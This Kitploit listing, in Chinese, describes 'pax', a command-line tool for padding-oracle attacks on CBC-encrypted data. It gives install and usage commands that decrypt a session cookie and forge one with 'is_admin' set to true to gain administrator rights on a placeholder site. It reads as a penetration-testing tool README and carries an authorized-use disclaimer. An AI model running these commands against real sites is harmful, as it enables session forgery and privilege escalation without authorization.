Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pax — :skull: :unlock: PKCS7填充预言攻击的CLI工具 | Kitploit
工具/GitHubGitHub/liamg/pax
漏洞利用Web应用程序漏洞利用密码学渗透测试
GitHubliamg/pax

pax

💀 🔓 PKCS7填充预言攻击的CLI工具

查看仓库
142175年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

pax

Travis Build Status GoReportCard

利用填充预言机(Padding Oracle)进行攻击,获得乐趣与收益!

Pax(填充预言机利用工具)是一款用于利用填充预言机的工具,可实现以下功能:

  1. 针对给定的 CBC 加密数据,获取其明文。
  2. 针对给定的明文,利用预言机未知的加密算法,获取加密后的字节。

该工具可用于泄露加密的会话信息,并且通常能够绕过身份验证、提升权限,甚至通过加密自定义明文并将其写回服务器来实现远程代码执行。

一如既往,此工具仅应用于你拥有所有权或已获得探测权限的系统!

安装

从发布页下载,或使用 Go 安装:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

使用示例

如果你发现了一个疑似预言机,且加密数据存储在名为 SESS 的 cookie 中,可以使用以下命令:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

这有望为你提供一些明文,例如:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

看起来你可以在此处提升权限!

你可以尝试首先生成自己的加密数据,让预言机将其解密回你想要的隐秘明文:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

这将输出另一组 Base64 编码的加密数据,例如:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

现在,你可以打开浏览器,将 SESS cookie 的值设置为上述值。加载原始预言机页面后,你应该会发现自己的权限已提升至管理员级别。

原理是什么?

以下是一些关于此攻击方法的优秀指南:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
下载工具